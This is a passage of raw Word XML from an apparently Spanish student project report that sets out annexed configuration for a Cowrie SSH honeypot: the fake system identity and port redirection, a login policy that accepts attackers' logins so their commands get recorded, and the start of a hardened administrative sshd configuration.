          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># con un límite de tamaño para no llenar el disco.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">download_limit_size = 10485760</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Sesiones inactivas se cierran a los 3 minutos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">interactive_timeout = 180</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[shell]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Identidad del sistema falso, coherente con el filesystem que trae</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Cowrie (Debian 12). Se cambian los valores por defecto, también</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># conocidos como firma, por otros plausibles de un Debian actualizado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">kernel_version = 6.1.0-31-amd64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">kernel_build_string = #1 SMP PREEMPT_DYNAMIC Debian 6.1.128-1 (2025-02-07)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">hardware_platform = x86_64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">operating_system = GNU/Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># x86_64 es la arquitectura que más malware recibe: maximiza capturas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">arch = linux-x64-lsb</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[ssh]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">enabled = true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">version = SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Cowrie escucha en 2222 (puerto sin privilegios). iptables redirige</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># el tráfico del 22 público a este puerto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">listen_endpoints = tcp:2222:interface=0.0.0.0</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[telnet]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Fuera de alcance del proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">enabled = false</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[output_jsonlog]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">enabled = true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">logfile = ${honeypot:log_path}/cowrie.json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="200" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">epoch_timestamp = false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Anexo B. Credenciales del Honeypot (userdb.txt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Fichero /home/cowrie/honeypot/etc/userdb.txt. Debe ser ASCII puro (véase el capítulo de Pruebas).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="12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userdb.txt - Credenciales aceptadas por el honeypot (PFC-Cowrie)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Ruta en el servidor: /home/cowrie/honeypot/etc/userdb.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  IMPORTANTE: este fichero debe ser ASCII puro (sin tildes ni enies).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Cowrie 3.x lo lee como ASCII; un solo caracter no ASCII hace que</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  rechace TODOS los logins sin dar ningun aviso visible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Formato:  usuario:x:password  (gana la primera linea que coincide)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  '*' = cualquiera  /  '!' delante = denegar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Estrategia: se rechazan las passwords mas probadas (root, 123456,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  admin...) para que los bots sigan intentandolo y registren mas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  credenciales; cualquier otra password para root/admin/ubuntu entra,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  de modo que tambien se capturan los comandos tras el acceso.</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root:x:!root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">root:x:!123456</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">root:x:!password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">root:x:*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:x:!admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:x:*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ubuntu:x:!ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="200" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ubuntu:x:*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Anexo C. Configuración del SSH de Administración</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Se instala como /etc/ssh/sshd_config.d/00-pfc-hardening.conf; el script sustituye __ADMIN_USER__ por el usuario administrador.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="12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/etc/ssh/sshd_config.d/00-pfc-hardening.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  SSH real de administracion (PFC-Cowrie)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Se llama "00-" porque sshd usa el PRIMER valor que encuentra de cada</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  opcion: asi este fichero gana a 50-cloud-init.conf, 60-cloudimg...</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Puerto no estandar: el 22 queda para el honeypot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
